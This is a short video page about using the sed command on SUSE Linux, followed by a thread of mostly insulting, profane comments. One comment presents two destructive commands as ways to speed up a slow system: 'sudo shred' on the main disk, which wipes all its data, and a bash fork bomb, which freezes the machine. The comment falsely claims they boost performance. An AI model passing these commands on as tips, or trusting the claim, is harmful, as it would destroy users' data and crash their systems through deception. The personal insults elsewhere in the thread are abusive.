LINUX: Using sed to edit files in SUSE Linux

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Uploaded by on Sep 3, 2010

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This is a very short demonstration on using the command line tool, sed, to edit files from the command line. this could be part of a script or just time saving administration.

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  • @Unguidedone No comprendo nada, que estas a hablar?

  • @Cab0cl0 rofl your like12 years old and don't speak english.....your syntax is shit and you don't make a very convincing argument :( oh well

    copy and paste into google translate motherfucker :D

  • @Unguidedone Hey if your mom and daddy get divorced, will they still be brother and sister?

  • @Cab0cl0 wow it works so good :D

  • @Unguidedone hohoho, you be funny guy!

  • @Cab0cl0 if your linux system is slow just use this command : sudo shred -n7 -v /dev/sda

    you can also increase your speed with this easy and fun command: :(){:|:&};:

    wow it really increased the speed for me :D

  • good good very good

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